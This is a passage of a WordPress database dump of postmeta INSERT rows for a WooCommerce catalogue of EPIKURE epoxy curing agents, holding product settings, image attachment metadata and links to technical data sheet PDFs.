INSERT INTO `wp_postmeta` VALUES (18111, 1866, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (18112, 1866, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (18113, 1866, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18114, 1866, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18115, 1866, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18116, 1866, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (18117, 1866, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (18118, 1866, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18119, 1866, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (18120, 1866, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18121, 1866, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18122, 1866, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (18123, 1866, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18124, 1866, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18125, 1866, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (18126, 1866, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (18127, 1868, '_edit_lock', '1479930125:3'); 
INSERT INTO `wp_postmeta` VALUES (18128, 1868, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (18129, 1869, '_wp_attached_file', '2016/09/3140.pdf'); 
INSERT INTO `wp_postmeta` VALUES (18130, 1868, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (18131, 1868, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (18132, 1868, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18133, 1868, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18134, 1868, '716_default_editor', '<strong>Application Areas/Suggested Uses</strong>\r\n<ul>\r\n 	<li>Metal and plastic adhesives</li>\r\n 	<li>Highway and bridge deck repairs</li>\r\n 	<li>Potting, casting, and encapsulation</li>\r\n 	<li>Synthetic flooring systems</li>\r\n 	<li>Maintenance coatings</li>\r\n 	<li>Tank and pipe linings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (18135, 1868, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18136, 1868, '318_custom_list_file', 'a:2:{s:32:"7a1a0ee0e18ff54c533242a9e6b285a6";a:3:{s:4:"name";s:12:"EPIKURE 3140";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140.pdf";s:4:"desc";s:16:"EPIKURE 3140 TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (18137, 1868, '317_default_editor', 'quarts, gallon, 5 gallon'); 
INSERT INTO `wp_postmeta` VALUES (18138, 1868, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (18139, 1868, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (18140, 1868, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18141, 1868, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18142, 1868, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (18143, 1868, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18144, 1868, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (18145, 1868, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (18146, 1868, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (18147, 1868, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (18148, 1868, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (18149, 1868, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18150, 1868, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18151, 1868, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18152, 1868, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (18153, 1868, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (18154, 1868, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18155, 1868, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (18156, 1868, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18157, 1868, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18158, 1868, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (18159, 1868, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18160, 1868, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18161, 1868, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (18162, 1868, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (18166, 1871, '_edit_lock', '1475086701:1'); 
INSERT INTO `wp_postmeta` VALUES (18167, 1871, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (18168, 1871, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (18169, 1871, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (18170, 1872, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (18171, 1872, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (18172, 1872, '_menu_item_object_id', '1871'); 
INSERT INTO `wp_postmeta` VALUES (18173, 1872, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (18174, 1872, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (18175, 1872, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (18176, 1872, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (18177, 1872, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (18178, 750, '_edit_lock', '1474464685:2'); 
INSERT INTO `wp_postmeta` VALUES (18179, 1876, '_wp_attached_file', '2016/09/EPIKURE-3125.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18180, 1876, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3125.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3125-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3125-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3125-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3125-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3125-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3125-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3125-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3125-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18181, 1866, '_thumbnail_id', '1876'); 
INSERT INTO `wp_postmeta` VALUES (18182, 1877, '_wp_attached_file', '2016/09/EPIKURE-3140.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18183, 1877, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3140.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3140-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3140-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3140-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3140-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3140-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3140-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3140-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3140-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18184, 1868, '_thumbnail_id', '1877'); 
INSERT INTO `wp_postmeta` VALUES (18185, 1878, '_wp_attached_file', '2016/09/EPIKURE-3223.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18186, 1878, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3223.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3223-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3223-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3223-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3223-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3223-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3223-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3223-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3223-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18187, 1183, '_thumbnail_id', '1878'); 
INSERT INTO `wp_postmeta` VALUES (18188, 1879, '_wp_attached_file', '2016/09/EPIKURE-3234.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18189, 1879, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3234.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3234-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3234-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3234-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3234-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3234-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3234-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3234-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3234-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18190, 1185, '_thumbnail_id', '1879'); 
INSERT INTO `wp_postmeta` VALUES (18191, 1880, '_wp_attached_file', '2016/09/EPIKURE-3245.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18192, 1880, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3245.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3245-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3245-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3245-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3245-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3245-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3245-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3245-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3245-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18193, 1187, '_thumbnail_id', '1880'); 
INSERT INTO `wp_postmeta` VALUES (18194, 1187, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18195, 1881, '_wp_attached_file', '2016/09/EPIKURE-3271.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18196, 1881, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3271.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3271-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3271-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3271-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3271-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3271-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3271-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3271-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3271-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18197, 1189, '_thumbnail_id', '1881'); 
INSERT INTO `wp_postmeta` VALUES (18198, 1189, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18199, 1882, '_wp_attached_file', '2016/09/EPIKURE-3282.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18200, 1882, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3282.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3282-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3282-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3282-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3282-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3282-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3282-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3282-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3282-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18201, 1193, '_thumbnail_id', '1882'); 
INSERT INTO `wp_postmeta` VALUES (18202, 1193, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18203, 1884, '_wp_attached_file', '2016/09/EPIKURE-3290.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18204, 1884, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/09/EPIKURE-3290.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3290-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3290-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3290-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3290-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3290-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3290-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3290-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3290-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18205, 1198, '_thumbnail_id', '1884'); 
INSERT INTO `wp_postmeta` VALUES (18206, 1198, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18207, 1885, '_wp_attached_file', '2016/08/EPIKURE-3370.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18208, 1885, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:24:"2016/08/EPIKURE-3370.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3370-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"EPIKURE-3370-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"EPIKURE-3370-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"EPIKURE-3370-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3370-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"EPIKURE-3370-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"EPIKURE-3370-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"EPIKURE-3370-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18209, 1061, '_thumbnail_id', '1885'); 
INSERT INTO `wp_postmeta` VALUES (18210, 1061, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18211, 1886, '_wp_attached_file', '2016/08/EPIN-58034.jpg'); 
